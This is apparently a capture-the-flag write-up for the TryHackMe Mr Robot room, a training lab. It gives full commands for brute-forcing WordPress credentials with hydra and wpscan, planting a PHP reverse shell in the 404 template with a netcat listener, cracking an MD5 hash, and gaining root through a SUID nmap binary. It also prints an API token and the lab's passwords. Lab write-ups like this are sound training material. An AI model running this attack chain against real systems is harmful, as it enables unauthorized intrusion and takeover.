Mr Robot CTF (The Easy Way)
Today we will be doing Mr Robot CTF room of the tryhackme. Mr Robot is the CTF for beginner and intermediate level.
At first we have to download the openvpn file and connect to the tryhackme using openvpn. Process of connecting is shown in the Mr Robot CTF room.
Now first lets scan the given ip address using nmap/zenmap. If you are a beginner I recommend you to use zenmap as it is the graphical tool for nmap.
Here i will be using zenmap as it will be easy to demonstrate it .From the zenmap scan we can see that the port 80 and 443 are opened.
As port 80 is for http and 443 is for https lets copy the ip address in browser to open the website.
Here a website will open.Website is based on the Theme of Mr Robot series.
Now let’s search for a directory of the website using gobuster.
Syntax for using gobuster in website ip address
gobuster dir -u http://IP -w /path_to_wordlist_/
Here, -u flag is for specifying url
and -w flag for specifying wordlist
Example:
gobuster dir -u http://10.10.245.39 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 2>/dev/null
Here for directory searching we will be using wordlist : directory-list-2.3-medium.txt
Here 2 > /dev/null is done to redirect any error to /dev/null .(It’s not compulsory)
Now let’s try to go to each directory to search for keys or any hint.
From trying a bunch of urls I found out that /wp-login and /robots are two directory that are useful for us.
/wp-login is the login page for wordpress
/robots contain information about the first key and a dictionary .
Here now let’s go to ip/key-1-of-3.txt .
For example: 10.10.72.66/key-1-of-3.txt .
Here once we go to the above mentioned url we will get the first key.
Similarly let’s go to IP/fsocity.dic url to download the fsocity.dic file.
Now let’s check the no of words inside the dsocity.dic file using the command.
wc fsocity.dic
Here we can see that there are a total of 858160 words in fsocity.dic file .Here there is hgh chance that the words inside the files are duplicate so lets eliminate the duplicate words.
For this we have to use following command
sort fsocity.dic | uniq > sorted_fscociety.dic
Here above command sorts the fsocity.dic file and then stores unique words inside the sorted_fscociety.dic file.
Now let’s check the word count of the sorted_fscociety.dic file
Here we can see that there are now 11451 words which is very less than 858160.
Now our task is to find the username and password of wp-login . For this we have to use the above provided dictionary (sorted_fscociety.dic).
Now for the username as this room is based on the series Mr Robot whose main character name is elliot so when i tried to enter elliot as username and some random password then it says incorrect password for the username which means that the username is correct and password is wrong.
Here Above mentioned process is process of random guessing where on the basis of the series i have guessed the username. However it is not a real case scenario .For users who don’t have watched Mr Robot it might be difficult to guess the username so for this another way is to brute force username using the above word list and with the help of hydra.
For this at first let’s intercept the request of /wp-login using burp suite to check the parameter names and host.
Now let’s use hydra to perform brute force on the username :
hydra -L sorted_fscociety.dic -p test 10.10.44.38 http-post-form “/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.245.39%2Fwp-admin%2F&testcookie=1:F=Invalid username”
-L is to login with several login in a file
-p is for password
^USER^ and ^PASS^ is for hydra field were hydra will bruteforce
&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.245.39%2Fwp-admin%2F&testcookie=1 are parameters
:F=Invalid username is error message
10.10.200.191 Host
http-post-form for specifying post method
/wp-login/ is directory
Here we will get elliot as a username
Now, lets brute force password of elliot
To perform password bruteforce lets use wpscan tool .
Here latest wpscan version need api token so for this at first we have to create an account on
And then use the generated API key.
Command to perform bruteforce in password is:
wpscan — url http://IP/wp-login -U elliot -P /location_to_wordlist/ — api-token your_api_key
wpscan — url http://10.10.44.38/wp-login -U elliot -P ~/Downloads/sorted_fscociety.dic — api-token BTmbaz7S8hst4pZi7LEjndkb2c1R9Q6rOg
— url: specifies the full URL that you want to scan (don’t forget the ‘http’)
-U: the username to use
-P: the password file to use
Now let’s login to /wp-login/ using the username : elliot and password:ER28–0652
After logging now try to gain access to the web server using reverse_shell . For this we have to edit files with php extension so that we can add reverse_shell code in php.
We will be editing 404.php file and for this go to Appearance-> editor-> and choose 404 Template
Now let’s replace the original content of the 404.php with the reverse shell code that you can obtain from
Here in revershell code you have to place your ip address
$ip = ‘127.0.0.1’; // CHANGE THIS
You can also change port number if you want but it’s not compulsory.
$port = 1234; // CHANGE THIS
Here now to get a reverse shell let’s start listening using netcat
nc -lnvp 1234
Here 1234 is port number
Now let’s go to ip/404/php to get the reverse shell.
Here we obtain a reverse shell which is unstable thus to get a stable shell we use the following command
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Here we get the stable shell.
Now let’s go to the /home/robot directory where we can see that there are two files .
We don’t have access to read key-2-of-3.txt as currently we are daemon and we need to be robot to read the file.However we have password.raw-md5 file which is md5 encrypted now lets encrypt the content of the file in our local machine using hashcat
Command used
hashcat -m 0 hash.txt /usr/share/wordlist/rockyou.txt
Here we have copied the content of password.raw-md5 into hash.txt
Here from the result we get to know that the decrypted password is abcdefghijklmnopqrstuvwxyz
Now let’s change the user to robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
Now let’s read the content of key-2-of-3.txt using command : cat key-2-of-3.txt
Here we successfully get the second key.
The last flag for most CTFs is almost always in the /root directory but only the root user has access to that directory. A very common way of escalating privileges on a Linux system is to look for binaries that have the SUID bit set and abusing them.
Now for third key we need to get directory /root and we need to be root
Now to search for potential privilege escalation we can use linpeas,linenum or simply use the below command .
find / -perm +6000 2>/dev/null | grep ‘/bin/’
Here we can see nmap binaries are set to SUID bit and by searching i get to know that old version of nmap can be used to run shell command by using it in interactive mode
Command used:
nmap -interactive
!sh
Here we get root access now let's read the content of key-3-of-3.txt file inside root.
BINGO!! we get the third key.
Here from this lab we get to know about various techniques like information gathering( using nmap,gobuster), Getting reverse shell ,bruteforcing(using hydra, wpscan),Privelege escalation(exploiting nmap).
References: